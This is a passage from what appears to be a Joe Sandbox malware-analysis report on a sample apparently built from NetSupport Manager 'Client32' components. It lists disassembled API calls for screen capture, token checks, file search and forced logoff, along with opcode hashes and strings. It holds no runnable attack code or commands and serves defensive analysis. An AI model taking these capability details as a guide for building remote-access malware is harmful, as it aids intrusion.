                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                    • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                    • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                    • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationToken
                                                                                    • String ID:
                                                                                    • API String ID: 4114910276-0
                                                                                    • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                    • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                    • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                    • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                      • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 328603210-0
                                                                                    • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                    • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                    • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                    • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __waccess_s
                                                                                    • String ID:
                                                                                    • API String ID: 4272103461-0
                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                    • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                    • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __fsopen
                                                                                    • String ID:
                                                                                    • API String ID: 3646066109-0
                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                    • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                    • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                    APIs
                                                                                    • _NSMClient32@8.PCICL32(?,?,?,002D10A2,00000000), ref: 002D100B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4157770634.00000000002D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002D0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4157702071.00000000002D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_2d0000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Client32@8
                                                                                    • String ID:
                                                                                    • API String ID: 433899448-0
                                                                                    • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                    • Instruction ID: 88b3927b9d0ade578fc83778cf803b14d904b6032bea4da2806d72e5ab2a8e7f
                                                                                    • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                    • Instruction Fuzzy Hash: ACB092B212834DAB8714EE98E841C7B339CAA98600B00080ABD0543782CA61FC709A71
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                      • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                      • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                      • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                      • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                      • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                      • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                    • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                    • SetEvent.KERNEL32(00000264), ref: 1102D3E7
                                                                                    • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                    • PostThreadMessageA.USER32(00001DB8,00000000,00000000,00000000), ref: 1102D5BC
                                                                                    • CloseHandle.KERNEL32(00000294), ref: 1102D815
                                                                                    • _free.LIBCMT ref: 1102D825
                                                                                    • _free.LIBCMT ref: 1102D841
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                    • _memset.LIBCMT ref: 1102D983
                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                    • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                    • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                    • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                    • String ID: *.*$364339$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                    • API String ID: 2369127096-1528717444
                                                                                    • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                    • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                    • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                    • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 111132BA
                                                                                    • GetTickCount.KERNEL32 ref: 1111332E
                                                                                    • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                    • GetClientRect.USER32(?,?), ref: 11113402
                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                    • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                    • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                    • DeleteObject.GDI32(?), ref: 11113684
                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                    • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                    • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                    • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                    • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                    • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                    • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                    • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                    • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                    • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                    • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                    • DeleteObject.GDI32(?), ref: 11113816
                                                                                    • DeleteObject.GDI32(?), ref: 11113820
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                    • String ID:
                                                                                    • API String ID: 879653699-0
                                                                                    • Opcode ID: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                    • Instruction ID: 189fb298e01def9bf465b0ce988e90e2b94731e78913cb033f8d66d61a6768cc
                                                                                    • Opcode Fuzzy Hash: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                    • Instruction Fuzzy Hash: E112F7B1A147099FDB14CFB8C984AAEF7F9EF88315F10452DE55A9B258DB70A841CF10
                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                      • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                    • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                    • _sprintf.LIBCMT ref: 1103B2BB
                                                                                    • _fputs.LIBCMT ref: 1103B330
                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                    • _free.LIBCMT ref: 1103B336
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                    • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 383231468-3762817415
                                                                                    • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                    • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                    • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                    • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                    • IsIconic.USER32(00000001), ref: 110CB349
                                                                                    • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                    • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                    • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                    • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                    • API String ID: 2655531791-1552842965
                                                                                    • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                    • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                    • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                    • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
